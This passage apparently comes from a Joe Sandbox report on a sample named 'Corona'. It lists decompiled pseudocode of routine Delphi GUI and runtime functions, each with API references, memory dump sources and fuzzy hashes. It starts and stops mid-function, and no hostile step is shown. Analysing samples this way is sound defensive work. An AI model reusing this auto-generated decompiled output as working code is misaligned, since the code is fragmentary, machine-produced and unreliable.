                                  					return E004030FC(_v16);
                                  				} else {
                                  					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                  						_v12 = E004136F8(_v16, 0);
                                  						E004135E8(_v16, 0);
                                  						L00405F64();
                                  						 *[fs:eax] = _t74;
                                  						 *[fs:eax] = _t74;
                                  						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x419031, _t72, 0x452868);
                                  						_pop(_t66);
                                  						 *[fs:eax] = _t66;
                                  						_t67 = 0x419002;
                                  						 *[fs:eax] = _t67;
                                  						_push(E00419038);
                                  						_push(0x452868);
                                  						L00405E3C();
                                  						return 0;
                                  					} else {
                                  						goto L15;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00418F03
                                  • GetCurrentThreadId.KERNEL32 ref: 00418F12
                                    • Part of subcall function 00418ED0: ResetEvent.KERNEL32(00000180,00418F4D,?,?,00000000), ref: 00418ED6
                                  • RtlEnterCriticalSection.KERNEL32(00452868,?,?,00000000), ref: 00418F57
                                  • InterlockedExchange.KERNEL32(004503E8,?), ref: 00418F73
                                  • RtlLeaveCriticalSection.KERNEL32(00452868,00000000,00419067,?,00000000,00419086,?,00452868,?,?,00000000), ref: 00418FCC
                                  • RtlEnterCriticalSection.KERNEL32(00452868,00419038,00419067,?,00000000,00419086,?,00452868,?,?,00000000), ref: 0041902B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID: 0 E
                                  • API String ID: 2189153385-1209576767
                                  • Opcode ID: 0f0de51c7ad39bf4329b17c8d760aeec53a8f8fbb9996d7d22b560f6f2aafe57
                                  • Instruction ID: 468ee6b9b45cb750b43f03cd02a5ab5e3ddab11ee958945834f90c42d7968ca2
                                  • Opcode Fuzzy Hash: 0f0de51c7ad39bf4329b17c8d760aeec53a8f8fbb9996d7d22b560f6f2aafe57
                                  • Instruction Fuzzy Hash: F331E630A04704AFD711DF65C852AAEBBF9EB49704F6184BBF804A3691CB7C9D44CA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00423AAC(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				struct HMONITOR__* _t27;
                                  				struct tagMONITORINFO* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x452924 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						_t29->rcMonitor.left = 0;
                                  						_t29->rcMonitor.top = 0;
                                  						_t29->rcMonitor.right = GetSystemMetrics(0);
                                  						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405FF4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					 *0x452908 = E0042377C(4, _t23,  *0x452908, _t27, _t29);
                                  					_t24 = GetMonitorInfoA(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 00423ADD
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423B04
                                  • GetSystemMetrics.USER32 ref: 00423B19
                                  • GetSystemMetrics.USER32 ref: 00423B24
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423B4E
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: 3948025942b87be14b94fa04fe8614c938f02bd6c0ab9e29af396eeeeddd1b7f
                                  • Instruction ID: a9d37633d9173def41a8ba462371619da7ffd0f1340763b36fecd0d1b352b927
                                  • Opcode Fuzzy Hash: 3948025942b87be14b94fa04fe8614c938f02bd6c0ab9e29af396eeeeddd1b7f
                                  • Instruction Fuzzy Hash: 2411E4717013155FDB209F64AC44BA7BBF8EB06352F40453BE94697342D3B8B940CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00423C54(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x452926 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405FF4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x452910; // 0x423c54
                                  					 *0x452910 = E0042377C(6, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x452910(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423CAC
                                  • GetSystemMetrics.USER32 ref: 00423CC1
                                  • GetSystemMetrics.USER32 ref: 00423CCC
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423CF6
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoW$T<B
                                  • API String ID: 2545840971-3502606048
                                  • Opcode ID: 26a8972663c3bf4d49ad55f6186b034620a71b6943241b99d3f98adaac11bab3
                                  • Instruction ID: 9924f744eb8a59d183caab76218475336e3e47cb355a25965acab20640003ac7
                                  • Opcode Fuzzy Hash: 26a8972663c3bf4d49ad55f6186b034620a71b6943241b99d3f98adaac11bab3
                                  • Instruction Fuzzy Hash: D71124727013155FD720DF66AC457A7B7B8EB06312F40492BFC56A7241C7F8AA408BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00403CD0(void* __ecx) {
                                  				long _v4;
                                  				int _t3;
                                  
                                  				if( *0x452048 == 0) {
                                  					if( *0x450030 == 0) {
                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                  					}
                                  					return _t3;
                                  				} else {
                                  					if( *0x45221c == 0xd7b2 &&  *0x452224 > 0) {
                                  						 *0x452234();
                                  					}
                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                  					return WriteFile(GetStdHandle(0xfffffff5), E00403D58, 2,  &_v4, 0);
                                  				}
                                  			}

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E,?,?,?,00000001,00403E3E,004027CB,00402813,?,00000000), ref: 00403D09
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E,?,?,?,00000001,00403E3E,004027CB,00402813), ref: 00403D0F
                                  • GetStdHandle.KERNEL32(000000F5,00403D58,00000002,0044F588,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E), ref: 00403D24
                                  • WriteFile.KERNEL32(00000000,000000F5,00403D58,00000002,0044F588,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E), ref: 00403D2A
                                  • MessageBoxA.USER32 ref: 00403D48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: 1bc8f0b3b7ddf434434e4ab14f171152d6f6d2f90f953c27f7da1ec9df335ea4
                                  • Instruction ID: d25cad25df8e8659ab3ff43e7699d105ea690c04be041c70749b85a8f5bed30a
                                  • Opcode Fuzzy Hash: 1bc8f0b3b7ddf434434e4ab14f171152d6f6d2f90f953c27f7da1ec9df335ea4
                                  • Instruction Fuzzy Hash: F5F0966568538078FA20B7946D07F9B264C4745F17F20467FB614B80E387FC8584D66E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E0043B7EC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v44;
                                  				void* __edi;
                                  				void* __ebp;
                                  				void* _t46;
                                  				void* _t57;
                                  				intOrPtr _t85;
                                  				intOrPtr _t96;
                                  				void* _t117;
                                  				void* _t118;
                                  				void* _t127;
                                  				struct HDC__* _t136;
                                  				struct HDC__* _t137;
                                  				intOrPtr* _t138;
                                  				void* _t139;
                                  
                                  				_t119 = __ecx;
                                  				_t135 = __ecx;
                                  				_v8 = __edx;
                                  				_t118 = __eax;
                                  				_t46 = E0043B38C(__eax);
                                  				if(_t46 != 0) {
                                  					_t142 = _a4;
                                  					if(_a4 == 0) {
                                  						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                  						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                  							_t138 = E00421094(1);
                                  							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                  							E004223CC(_t138, 1);
                                  							 *((intOrPtr*)( *_t138 + 0x40))();
                                  							_t119 =  *_t138;
                                  							 *((intOrPtr*)( *_t138 + 0x34))();
                                  						}
                                  						E0041CBF8( *((intOrPtr*)(E0042165C( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                  						E004122C4(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( &_v44);
                                  						_t57 = E0042165C( *((intOrPtr*)(_t118 + 0x54)));
                                  						_pop(_t127);
                                  						E0041CF9C(_t57, _t127);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0xffffffff);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(E0041D2CC(E0042165C( *((intOrPtr*)(_t118 + 0x54)))));
                                  						_push(_v8);
                                  						_push(E0043B4C8(_t118));
                                  						L004236D4();
                                  						E004122C4(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                  						_v12 = E0041D2CC(E0042165C( *((intOrPtr*)(_t118 + 0x54))));
                                  						E0041CBF8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                  						_t136 = E0041D2CC(_t135);
                                  						SetTextColor(_t136, 0xffffff);
                                  						SetBkColor(_t136, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12 + 1);
                                  						_t85 = _a16 + 1;
                                  						__eflags = _t85;
                                  						_push(_t85);
                                  						_push(_t136);
                                  						L00406014();
                                  						E0041CBF8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                  						_t137 = E0041D2CC(_t135);
                                  						SetTextColor(_t137, 0xffffff);
                                  						SetBkColor(_t137, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12);
                                  						_t96 = _a16;
                                  						_push(_t96);
                                  						_push(_t137);
                                  						L00406014();
                                  						return _t96;
                                  					}
                                  					_push(_a8);
                                  					_push(E0043B1DC(_t142));
                                  					E0043B7C4(_t118, _t142);
                                  					_push(E0043B1DC(_t142));
                                  					_push(0);
                                  					_push(0);
                                  					_push(_a12);
                                  					_push(_a16);
                                  					_push(E0041D2CC(__ecx));
                                  					_push(_v8);
                                  					_t117 = E0043B4C8(_t118);
                                  					_push(_t117);
                                  					L004236D4();
                                  					return _t117;
                                  				}
                                  				return _t46;
                                  			}

                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0043B84B
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0043B8EC
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0043B939
                                  • SetBkColor.GDI32(00000000,00000000), ref: 0043B941
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 0043B966
                                    • Part of subcall function 0043B7C4: 73452240.COMCTL32(00000000,?,0043B825,00000000,?), ref: 0043B7DA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  • Opcode ID: ff7f43e51220a9331830a000d7053d2fad070fbfe78327324c379c6c3098ffa3
                                  • Instruction ID: 75d1f41abf72a4f6959905042e404fde6b0e7603268d965f267807dfd0857be0
                                  • Opcode Fuzzy Hash: ff7f43e51220a9331830a000d7053d2fad070fbfe78327324c379c6c3098ffa3
                                  • Instruction Fuzzy Hash: 9D511B71740114AFDB40EF69DD82F9E37ACAF08314F10115AFA14EB396CA78EC519769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0044A840(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				short _v22;
                                  				intOrPtr _v28;
                                  				struct HWND__* _v32;
                                  				char _v36;
                                  				intOrPtr _t50;
                                  				intOrPtr _t56;
                                  				intOrPtr _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr _t62;
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t68;
                                  				intOrPtr _t70;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t85;
                                  				void* _t90;
                                  				intOrPtr _t122;
                                  				void* _t124;
                                  				void* _t127;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  
                                  				_t125 = __esi;
                                  				_t124 = __edi;
                                  				_t105 = __ebx;
                                  				_t127 = _t128;
                                  				_t129 = _t128 + 0xffffffe0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v36 = 0;
                                  				_v8 = __eax;
                                  				_push(_t127);
                                  				_push(0x44ab08);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t129;
                                  				E0042D054();
                                  				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                  					_t50 =  *0x450f0c; // 0x41a494
                                  					E0040597C(_t50,  &_v36);
                                  					E0040B1B8(_v36, 1);
                                  					E00403888();
                                  				}
                                  				if(GetCapture() != 0) {
                                  					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                  				}
                                  				ReleaseCapture();
                                  				_t56 =  *0x452bb0; // 0x2131714
                                  				E0044CCE0(_t56);
                                  				_push(_t127);
                                  				_push(0x44aaeb);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                  				_v32 = GetActiveWindow();
                                  				_t60 =  *0x450c24; // 0x2
                                  				_v20 = _t60;
                                  				_t61 =  *0x452bb4; // 0x2131320
                                  				_t62 =  *0x452bb4; // 0x2131320
                                  				E00413774( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t65 =  *0x452bb4; // 0x2131320
                                  				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                  				_t66 =  *0x452bb4; // 0x2131320
                                  				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                  				_t68 =  *0x452bb4; // 0x2131320
                                  				E0044BD10(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t70 =  *0x452bb4; // 0x2131320
                                  				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                  				_v16 = E00444C18(0, _t105, _t124, _t125);
                                  				_push(_t127);
                                  				_push(0x44aac9);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				E0044A790(_v8);
                                  				_push(_t127);
                                  				_push(0x44aa28);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				SendMessageA(E00434EF4(_v8), 0xb000, 0, 0);
                                  				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                  				do {
                                  					_t80 =  *0x452bb0; // 0x2131714
                                  					E0044DAEC(_t80, _t124, _t125);
                                  					_t82 =  *0x452bb0; // 0x2131714
                                  					if( *((char*)(_t82 + 0x9c)) == 0) {
                                  						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                  							E0044A6F0(_v8);
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                  					}
                                  					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                  				} while (_t85 == 0);
                                  				_v12 = _t85;
                                  				SendMessageA(E00434EF4(_v8), 0xb001, 0, 0);
                                  				_t90 = E00434EF4(_v8);
                                  				if(_t90 != GetActiveWindow()) {
                                  					_v32 = 0;
                                  				}
                                  				_pop(_t122);
                                  				 *[fs:eax] = _t122;
                                  				_push(0x44aa2f);
                                  				return E0044A788();
                                  			}

                                  APIs
                                  • GetCapture.USER32 ref: 0044A8B1
                                  • GetCapture.USER32 ref: 0044A8C0
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0044A8C6
                                  • ReleaseCapture.USER32(00000000,0044AB08), ref: 0044A8CB
                                  • GetActiveWindow.USER32 ref: 0044A8F2
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0044A988
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0044A9F5
                                  • GetActiveWindow.USER32 ref: 0044AA04
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  • Opcode ID: f768e723e21f48cef5d9a3aaf8ccbb2326ed41d758750cb9bf05cde070ac9dc9
                                  • Instruction ID: 49d063c2d4033cf090083a411ad423d85b49a9e64d15445e4ea0c99790836548
                                  • Opcode Fuzzy Hash: f768e723e21f48cef5d9a3aaf8ccbb2326ed41d758750cb9bf05cde070ac9dc9
                                  • Instruction Fuzzy Hash: 78515E30A40204AFEB04EF69C956B9E77F5FB49304F1544BAF400A73A2D778AE50CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00432F30(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                  				int _v8;
                                  				int _v12;
                                  				int _v16;
                                  				char _v20;
                                  				struct tagRECT _v36;
                                  				signed int _t54;
                                  				intOrPtr _t59;
                                  				int _t61;
                                  				void* _t63;
                                  				void* _t66;
                                  				void* _t82;
                                  				int _t98;
                                  				struct HDC__* _t99;
                                  
                                  				_t99 = __edx;
                                  				_t82 = __eax;
                                  				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                  				_v16 = SaveDC(__edx);
                                  				E0042D130(__edx, _a4, __ecx);
                                  				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  				_t98 = 0;
                                  				_v12 = 0;
                                  				if((GetWindowLongA(E00434EF4(_t82), 0xffffffec) & 0x00000002) == 0) {
                                  					_t54 = GetWindowLongA(E00434EF4(_t82), 0xfffffff0);
                                  					__eflags = _t54 & 0x00800000;
                                  					if((_t54 & 0x00800000) != 0) {
                                  						_v12 = 3;
                                  						_t98 = 0xa00f;
                                  					}
                                  				} else {
                                  					_v12 = 0xa;
                                  					_t98 = 0x200f;
                                  				}
                                  				if(_t98 != 0) {
                                  					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  					DrawEdge(_t99,  &_v36, _v12, _t98);
                                  					E0042D130(_t99, _v36.top, _v36.left);
                                  					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                  				}
                                  				E0042F98C(_t82, _t99, 0x14, 0);
                                  				E0042F98C(_t82, _t99, 0xf, 0);
                                  				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                  				if(_t59 == 0) {
                                  					L12:
                                  					_t61 = RestoreDC(_t99, _v16);
                                  					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                  					return _t61;
                                  				} else {
                                  					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                  					if(_t63 < 0) {
                                  						goto L12;
                                  					}
                                  					_v20 = _t63 + 1;
                                  					_v8 = 0;
                                  					do {
                                  						_t66 = E004136F8( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                  						_t107 =  *((char*)(_t66 + 0x57));
                                  						if( *((char*)(_t66 + 0x57)) != 0) {
                                  							E00432F30(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                  						}
                                  						_v8 = _v8 + 1;
                                  						_t36 =  &_v20;
                                  						 *_t36 = _v20 - 1;
                                  					} while ( *_t36 != 0);
                                  					goto L12;
                                  				}
                                  			}

                                  APIs
                                  • SaveDC.GDI32 ref: 00432F46
                                    • Part of subcall function 0042D130: GetWindowOrgEx.GDI32(?), ref: 0042D13E
                                    • Part of subcall function 0042D130: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042D154
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00432F67
                                  • GetWindowLongA.USER32 ref: 00432F7D
                                  • GetWindowLongA.USER32 ref: 00432F9F
                                  • SetRect.USER32 ref: 00432FCB
                                  • DrawEdge.USER32(?,?,?,00000000), ref: 00432FDA
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00432FFF
                                  • RestoreDC.GDI32(?,?), ref: 00433070
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: 713d136c56e4b7bb8461f56c2e576d34430783573870ff1f186abf40c795624c
                                  • Instruction ID: 95613bb5b6831907de8f8b08e7580be1b75c51429df70aadc16fbd64d1d5bfe6
                                  • Opcode Fuzzy Hash: 713d136c56e4b7bb8461f56c2e576d34430783573870ff1f186abf40c795624c
                                  • Instruction Fuzzy Hash: A0415571B001146BDB14EF99CC81FAFB7B8AF49704F10416AF905EB386DA79DD0187A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E0041DC04(void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v1000;
                                  				char _v1004;
                                  				char _v1032;
                                  				signed int _v1034;
                                  				short _v1036;
                                  				void* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				intOrPtr _t29;
                                  				intOrPtr _t45;
                                  				intOrPtr _t52;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t54 = _t55;
                                  				_v1036 = 0x300;
                                  				_v1034 = 0x10;
                                  				_t25 = E004028B8(_t24, 0x40,  &_v1032);
                                  				_push(0);
                                  				L0040638C();
                                  				_v8 = _t25;
                                  				_push(_t54);
                                  				_push(0x41dd01);
